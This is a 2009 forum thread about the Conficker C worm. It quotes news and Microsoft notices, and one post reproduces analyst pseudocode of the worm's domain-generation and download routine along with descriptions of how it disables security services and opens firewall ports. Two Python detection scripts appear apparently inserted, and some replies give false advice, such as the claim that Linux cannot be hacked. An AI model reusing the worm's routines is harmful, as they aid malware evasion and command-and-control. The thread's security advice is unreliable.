Thread: Heads up! Conficker worm!

Page 1 of 2
Results 1 to 15 of 27
  1. #1 Heads up! Conficker worm! 
    -The_King- (Senior Member, PSP Mad Hacker)
    Join Date
    Dec 2008
    Posts
    517
    Beware Conficker worm come April 1.

    Quote Originally Posted by yahoo
    In an event that hits the computer world only once every few years, security experts are racing against time to mitigate the impact of a bit of malware which is set to wreak havoc on a hard-coded date. As is often the case, that date is April 1.

    Malware creators love to target April Fool's Day with their wares, and the latest worm, called Conficker C, could be one of the most damaging attacks we've seen in years.

    Conficker first bubbled up in late 2008 and began making headlines in January as known infections topped 9 million computers. Now in its third variant, Conficker C, the worm has grown incredibly complicated, powerful, and virulent... though no one is quite sure exactly what it will do when D-Day arrives.

    Thanks in part to a quarter-million-dollar bounty on the head of the writer of the worm, offered by Microsoft, security researchers are aggressively digging into the worm's code as they attempt to engineer a cure or find the writer before the deadline. What's known so far is that on April 1, all infected computers will come under the control of a master machine located somewhere across the web, at which point anything's possible. Will the zombie machines become denial of service attack pawns, steal personal information, wipe hard drives, or simply manifest more traditional malware pop-ups and extortion-like come-ons designed to sell you phony security software? No one knows.

    Conficker is clever in the way it hides its tracks because it uses an enormous number of URLs to communicate with HQ. The first version of Conficker used just 250 addresses each day -- which security researchers and ICANN simply bought and/or disabled -- but Conficker C will up the ante to 50,000 addresses a day when it goes active, a number which simply can't be tracked and disabled by hand.

    At this point, you should be extra vigilant about protecting your PC: Patch Windows completely through Windows Update and update your anti-malware software as well. Make sure your antivirus software is actually running too, as Conficker may have disabled it.

    Microsoft also offers a free online safety scan here, which should be able to detect all Conficker versions.
    For the nerds: Conficker C Analysis | Technical Report

    Quote Originally Posted by Microsoft
    Conficker Activity Update

    There’s been a lot of activity today around the Conficker worm here at Microsoft and across the industry. I wanted to give everyone a quick, high-level overview on what’s been going on today.

    First, today we’re making public, the work we and many other industry and academic partners have been doing behind the scenes to help combat the Conficker worm.

    Second, we’ve provided additional information from our research to our Microsoft Active Protections Program (MAPP) partners and our Microsoft Security Response Alliance (MSRA) partners and posted it to the MSRC weblog in an effort to help customers and other researchers.

    Finally, we have announced a US$250,000 reward for information that results in the arrest and conviction of those responsible for illegally launching the Conficker worm. Individuals with information about the Conficker worm are encouraged to contact their international law enforcement agencies. Additionally, Microsoft has implemented an Antivirus Reward Hotline, 1-425-706-1111, and an Antivirus Reward Mailbox, avreward@microsoft.com, where tips can be shared.

    The work that we’ve done with industry and academic partners and the additional information that we’ve provided all relate to the same thing: disrupting the Conficker worm’s attempts to connect to domains on the Internet after successfully attacking a system. By understanding the algorithm that the Conficker worm uses to generate the domain names that infected systems attempt to connect to, we can take steps to disrupt the Conficker worm by blocking access to those domains by infected systems.

    We have worked with ICANN and operators within the domain name system to proactively disable a significant number of domains that systems infected by the Conficker worm would try to connect to.

    We have also made information about the algorithm and the list of domain names available so that security researchers and customers can review logs to identify infected systems connecting to these domains and proactively block access to these domains.

    As someone involved in security response for a number of years, it’s exciting for me to see the industry come together to take an innovative, new approach to combating malware. It helps prove again that while threats may be evolving, so too is our response as an industry to these threats.

    Thanks.
    Christopher

    Updated 2/14/2009 with contact information regarding Antivirus Reward
    *This posting is provided "AS IS" with no warranties, and confers no rights*

    Yeah.
    Try not to download anything from sites you know are not 100% safe!

  2. #2  
    Mobster (Homebrew Creator, PSP Elite Hacker)
    Join Date
    Dec 2008
    Posts
    1,716
    so like qj is fine
    Left4Quake donation complete!

    Left 4 Dead on PSP!

  3. #3  
    mwgplyr (Junior Member, PSP User)
    Join Date
    Mar 2009
    Posts
    29
    Just don't mess around with LimeWire or torrents (aXXo's are fine, just check hashes)... scan your PC and if you find the worm USE SOMETHING CALLED WARRANTY or INSURANCE. DO NOT TRY TO GET RID OF THE WORM YOURSELF! If you don't have insurance, get it before D-Day.

    EDIT: it seems, from my understanding, that the worm uses a set of domains (could be thousands...) and then splits to 50k IPs, making it over 1 mil+ possible IPs; most of them (almost all but like 2k) would be web-based dummy codes

    int domain_name_generation()
    {
        // local declarations
        hMem = 0;
        check_if_MS_DEF_PROV();
        get_time_from_popular_web_sites();
        // baidu.com, google.com, yahoo.com, ask.com, w3.org,
        // facebook.com, imageshack.us, rapidshare.com

        hMem = GlobalAlloc(0x40u, 0x30D40u); // global array - 50,000 random names
        if ( hMem )
        {
            while ( 1 )
            {
                counter_domains = counter;
                if ( counter >= 50000 )
                    break;

                size_of_name = DGA_random_function() % 6 + 4;
                // size of domain name is between 4 and 10 chars
                // append "." at the end of the name
                random = DGA_random_function();
                strcat(domainname, TLD_suffix[random % 116]);
                // append 1 of 116 suffixes (from 110 TLDs) to domain name
                ++counter;
            }

            // select and query 500 domains
            counter_domains = 0;
            while ( !success_download && counter_domains < 500 )
            {
                // random number modulo 50,000
                one_in_50000_names = conficker_D_PRNG_function() % 50000;
                hostent = gethostbyname(one_in_50000_names);
                // resolve name to a set of IP addresses
                if ( hostent )
                {
                    host_address = hostent->address_list; // get list of IPs
                    array_previously_checked_IPs[counter_domains] = host_address;

                    if ( *host_address )
                    {
                        // skip if domain name resolves to multiple IP addresses
                        if ( !*(host_address + 1) )
                        {
                            // skip if IP is local host or other trivial IPs
                            if ( check_IP_value(host_address) )
                            {
                                is_blacklisted_ip = check_if_IP_is_in_ranges(host_address);
                                // skip if IP is blacklisted
                                if ( !is_blacklisted_ip )
                                {
                                    found = 0;
                                    index = 0;
                                    while ( index < counter_domains )
                                    {
                                        if ( host_address == array_previously_checked_IPs[index] )
                                        {
                                            found = 1;
                                            break; // break if IP has been previously encountered
                                        }
                                        ++index;
                                    }
                                    // skip if IP has been previously encountered
                                    if ( !found )
                                    {
                                        snprintf(Dest, 0x80u, "http://%s", host_address);
                                        success_download = download_and_validate_file(Dest);
                                        // HTTP request to the domain and download valid file
                                    }
                                }
                            }
                        }
                    }
                }
                Sleep(...); // sleep small random amount
                ++counter_domains;
            }
        }
        GlobalFree(hMem);
        return success_download;
    }
    EDIT: It also disables detection by basically all virus scanners ... even other viruses

    Domain Lookup Prevention

    At each process initialization, Conficker C applies an in-memory patch to dnsapi.dll (Windows XP, 2K) or dnsrslvr.dll (Vista). It does not patch the DLL files on the filesystem, only their in-memory instances. These DLLs contain the standard Windows APIs for domain name resolution and caching. Conficker modifies Windows' DNS lookup and cache services to prevent successful communications with various security product vendors and research sites. The list of blocked domain lookups is shown in Table 1.
    Windows Security Service Disablement

    Each time it starts, Conficker C spawns a thread to disable security services and terminate Conficker removal software. This thread is responsible for disabling Windows services that deliver security patches and software updates, effectively preventing the victim host from receiving automated software updates. For example, in addition to disabling Windows Defender and the Windows error reporting service, this logic disables BITS (Background Intelligent Transfer Service). The BITS service is used to prioritize, throttle, and control asynchronous file transfers between machines using idle network bandwidth. It is used by the Windows Update services and other software updaters to stay current with the latest patches and security hot fixes.

    Figure 6 provides a pseudo-code summary of the security disablement thread. The main program logic is shown in function disable_security_services_and_terminate_conficker_cleaners(). This function disables Windows Security Center Service (wscsvc), Windows Defender Service (WinDefend), Windows Automatic Update Service (wuauserv), BITS (Background Intelligent Transfer Service), Windows Error Reporting Service (ERSvc), and the Windows Error Reporting Service (WerSvc). It further deletes Windows Defender from the Run Registry Key, deactivates security center notifications (FD6905CE-952F-41F1-9A6F-135D9C6622CC), and deletes the safeboot security key. It then spawns the monitor_and_terminate_conficker_cleaners thread, discussed in Security Product Terminator Thread.

    The disable_security_service pseudo-code is also shown in Figure 6. This function illustrates the actual logic used to disable the five security services. First, C opens the security manager with all access privileges. It then loops through the set of resident services, ignoring all services reported as kernel devices. If it finds a matching device name, it first shuts down the service, sleeps for 4 seconds, and then sets the service configuration to permanently disable the service.
    Hell it even destroys your firewall:

    Firewall Disablement
    To interact with external clients during P2P communications, C disables the blocking of several high-order TCP and UDP application ports. This is done through HKLM modifications, where the opened ports are listed in the GloballyOpenPorts registry key. These ports are fixed per Conficker installation. The following is an example set of firewall modifications made during a Conficker C run:

    SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List, Value Name: 11930:TCP, New Value: 11930:TCP:*:Enabled:PackagesOffice MSDownloaded

    SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List, Value Name: 45436:TCP, New Value: 45436:TCP:*:Enabled:PackagesOffice SpeechGames

    SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List, Value Name: 48481:UDP, New Value: 48481:UDP:*:Enabled:PackagesOffice PagesPages

    SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List, Value Name: 57338:UDP, New Value: 57338:UDP:*:Enabled:PackagesOffice MediaDistribution

    Listed with these firewall port disablement changes are apparent product package names, such as MSDownloaded, SpeechGames, MediaDistribution, and PagesPages. These package names are bogus, and appear to associate these security changes to software packages that appear benign.
    Get ready for complete ownage...
    Last edited by mwgplyr; 03-29-2009 at 08:55 PM.
    PSP 2.71>1.50>3.71 m33>3.71m33-4>5.00 m33>5.00 m33-6



    Evilzone.org status: Down but currently rebuilding pages with more stable security


    If you hit Ctrl+W, you can see the rest of my sig...
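The domain-generation pseudocode quoted above gives a defender a usable fingerprint: an infected host resolves hundreds of short, random-looking names per cycle, spread over more than a hundred suffixes, and the vast majority come back NXDOMAIN because they were never registered. The following is an added example, not code from the post or from the SRI report, that applies that heuristic to resolver logs; the log line layout and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Resolver log line: timestamp, client IP, queried name, response code (assumed format).
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")

# Constructed sample log, not real traffic: 10.0.0.7 looks up many short
# random-looking names across many suffixes and mostly gets NXDOMAIN back.
SAMPLE_LOG = """\
2009-03-30T10:00:01 10.0.0.5 windowsupdate.microsoft.com NOERROR
2009-03-30T10:00:03 10.0.0.7 qwvtz.info NXDOMAIN
2009-03-30T10:00:03 10.0.0.7 hjkplm.biz NXDOMAIN
2009-03-30T10:00:04 10.0.0.7 rtyvbn.org NXDOMAIN
2009-03-30T10:00:04 10.0.0.7 lkjhgt.net NOERROR
2009-03-30T10:00:05 10.0.0.7 mnbvcx.cc NXDOMAIN
2009-03-30T10:00:05 10.0.0.7 zxcvbg.ws NXDOMAIN
2009-03-30T10:00:06 10.0.0.7 poiuyt.cn NXDOMAIN
2009-03-30T10:00:06 10.0.0.7 asdfgh.mobi NXDOMAIN
2009-03-30T10:00:07 10.0.0.7 qazwsx.tv NXDOMAIN
2009-03-30T10:00:07 10.0.0.7 edcrfv.name NXDOMAIN
2009-03-30T10:00:08 10.0.0.9 bing.com NOERROR
2009-03-30T10:00:09 10.0.0.9 typo.example NXDOMAIN
"""

def looks_like_dga_label(qname):
    """Candidate if the first label is 4-10 letters on a 2- or 3-label name,
    the shape the pseudocode's name generator and TLD-suffix table produce."""
    parts = qname.lower().rstrip(".").split(".")
    return len(parts) in (2, 3) and 4 <= len(parts[0]) <= 10 and parts[0].isalpha()

def score_clients(log_text, min_names=50, min_tlds=10, min_nx_ratio=0.8):
    """Flag clients whose candidate lookups are numerous, spread across many
    suffixes and mostly fail to resolve; returns {client: summary}."""
    stats = defaultdict(lambda: {"names": set(), "tlds": set(), "nx": 0, "total": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        _ts, client, qname, rcode = m.groups()
        name = qname.lower().rstrip(".")
        if not looks_like_dga_label(name):
            continue
        s = stats[client]
        s["names"].add(name)
        s["tlds"].add(name.split(".", 1)[1])  # everything after the first label
        s["total"] += 1
        s["nx"] += rcode == "NXDOMAIN"
    flagged = {}
    for client, s in stats.items():
        ratio = s["nx"] / s["total"]
        if len(s["names"]) >= min_names and len(s["tlds"]) >= min_tlds and ratio >= min_nx_ratio:
            flagged[client] = {"names": len(s["names"]), "tlds": len(s["tlds"]), "nx_ratio": ratio}
    return flagged
```

The default thresholds are sized for a real day of logs; the sample above is small, so run it with lower ones, e.g. score_clients(SAMPLE_LOG, min_names=8, min_tlds=5).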
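The firewall entries quoted in the post share a shape worth checking for on any host: an enabled exception, scoped to any remote address (the "*" field), on a high random port, carrying a made-up package label. The following is an added example, not code from the post or from the report, that audits GloballyOpenPorts value data of that layout; the fifth entry and the sanctioned-label set are constructed assumptions standing in for your own change records.

```python
import re

# Value data layout: port:protocol:scope:state:label (scope "*" = any remote address).
ENTRY_RE = re.compile(r"^(\d{1,5}):(TCP|UDP):([^:]*):(Enabled|Disabled):(.*)$")

# The four GloballyOpenPorts entries quoted in the post, plus one constructed
# benign entry (assumption) so the audit has something to leave alone.
SAMPLE_ENTRIES = [
    ("11930:TCP", "11930:TCP:*:Enabled:PackagesOffice MSDownloaded"),
    ("45436:TCP", "45436:TCP:*:Enabled:PackagesOffice SpeechGames"),
    ("48481:UDP", "48481:UDP:*:Enabled:PackagesOffice PagesPages"),
    ("57338:UDP", "57338:UDP:*:Enabled:PackagesOffice MediaDistribution"),
    ("3389:TCP", "3389:TCP:*:Enabled:Remote Desktop"),  # constructed
]

# Assumption: the labels your own change records say are sanctioned on this host.
SANCTIONED_LABELS = {"Remote Desktop"}

def parse_entry(value_name, value_data):
    """Split one registry value into fields; None if the layout is not recognised."""
    m = ENTRY_RE.match(value_data)
    if not m:
        return None
    port, proto, scope, state, label = m.groups()
    return {"port": int(port), "proto": proto, "scope": scope,
            "enabled": state == "Enabled", "label": label,
            "name_matches": value_name == f"{port}:{proto}"}

def audit_open_ports(entries, sanctioned=SANCTIONED_LABELS, high_port=10000):
    """Return [(value_name, [reasons])] for entries that deserve a closer look."""
    findings = []
    for value_name, value_data in entries:
        e = parse_entry(value_name, value_data)
        if e is None:
            findings.append((value_name, ["value data does not parse"]))
            continue
        reasons = []
        if not e["name_matches"]:
            reasons.append("value name does not match port:protocol in data")
        if e["enabled"] and e["scope"] == "*" and e["label"] not in sanctioned:
            reasons.append("enabled for any remote address under an unrecognised label")
        if e["enabled"] and e["port"] >= high_port:
            reasons.append("high, non-standard port")
        if reasons:
            findings.append((value_name, reasons))
    return findings
```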

  4. #4  
    mrbob3 (Senior Member, PSP Mad Hacker)
    Join Date
    Oct 2008
    Posts
    641
    I remember people getting worried on the 31st December 1999...

  5. #5  
    TR1X (Senior Member, I Modded My PSP)
    Join Date
    Apr 2008
    Posts
    359
    The obvious solution is a good can of worm repellent!

    god those nerds never think of the common sense solutions :P
    My Gaming Blog

    March 29th 09' = My 300th Post

    My Baby

  6. #6  
    Omega_redest (Senior Member, I Modded My PSP)
    Join Date
    Nov 2008
    Posts
    411
    Use Nod anti virus
    Threat fire
    and reg cure..

    it cleared my PC from this a few weeks ago

    As a defence combo, it has proved itself many times "only the best for my PC"
    Last edited by Omega_redest; 03-29-2009 at 10:40 PM.

  7. #7  
    Member PSP User
    Join Date
    Mar 2009
    Posts
    34
    It seems kind of convenient to be on April 1st. I mean really. Someone must have some good time to kill to want to make a joke or something of this size. I don't think there's much else it could do to my old piece of junk though.
    Hey now it's not all bad. You could be stuck in quicksand up to your neck...and not sink any further.

  8. #8  
    -The_King- (Senior Member, PSP Mad Hacker)
    Join Date
    Dec 2008
    Posts
    517
    Quote Originally Posted by Mitochondria View Post
    Probably all bullshit, and just an April Fools' Day joke. Making everyone paranoid as hell.
    You know that the Virus EXISTS!?
    And maybe it's already on your computer.. if you got windows ^^

    Well, we'll see what happens in 2 days..
    I'm excited

  9. #9  
    thecoo1est (I want it all, brand new socks and draws!, PSP Mad Hacker)
    Join Date
    Jul 2008
    Posts
    586
    Well, I keep everything that means something on another drive, so if I get the worm I'll format that motherfu*ker

  10. #10  
    Kaikz (Senior Member, PSP Elite Hacker)
    Join Date
    Nov 2008
    Posts
    4,882
    All you do is get the Ubuntu live CD, install it inside Windows and use that for a while; Linux can't be hacked, and you can access all of your Windows files and use them if you install Wine.

  11. #11  
    TR1X (Senior Member, I Modded My PSP)
    Join Date
    Apr 2008
    Posts
    359
    Ubuntu users are safe

  12. #12  
    Kaikz (Senior Member, PSP Elite Hacker)
    Join Date
    Nov 2008
    Posts
    4,882
    I already got a live CD

  13. #13  
    TR1X (Senior Member, I Modded My PSP)
    Join Date
    Apr 2008
    Posts
    359
    I converted about a year ago; now my laptops, desktops, and server all run Ubuntu

  14. #14  
    Omega_redest (Senior Member, I Modded My PSP)
    Join Date
    Nov 2008
    Posts
    411
    Conficker is real and f&%S you up completely

  15. #15  
    Stgdemon (Senior Member, I Modded My PSP)
    Join Date
    May 2008
    Posts
    370
    Sounds like Y2K all over again, lol! (not saying it's not real, but I'm sure they'll get it fixed soon enough)
    Made Switchable Pandora
    Piano Black slim with Undead Decal
    Firmware Piano Black 3.82>3.71M33>4.01M33-2>5.00M33-6>5.50GEN-B2 ~
    Red GoW addition 3.71>3.72m33-2>5.00m33-6 ~
    Grey 4.01>5.00m33-6

    UV Trigger and door LED's


